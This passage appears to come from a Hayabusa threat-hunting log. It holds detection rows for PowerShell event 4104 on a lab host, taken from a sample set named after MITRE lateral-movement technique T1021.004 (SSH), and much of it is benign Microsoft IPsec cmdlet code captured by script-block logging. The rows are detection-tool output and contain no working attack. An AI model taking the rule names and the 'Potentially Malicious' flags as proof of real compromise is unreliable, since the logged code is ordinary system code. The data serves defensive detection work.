$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'c",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) 
$__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and 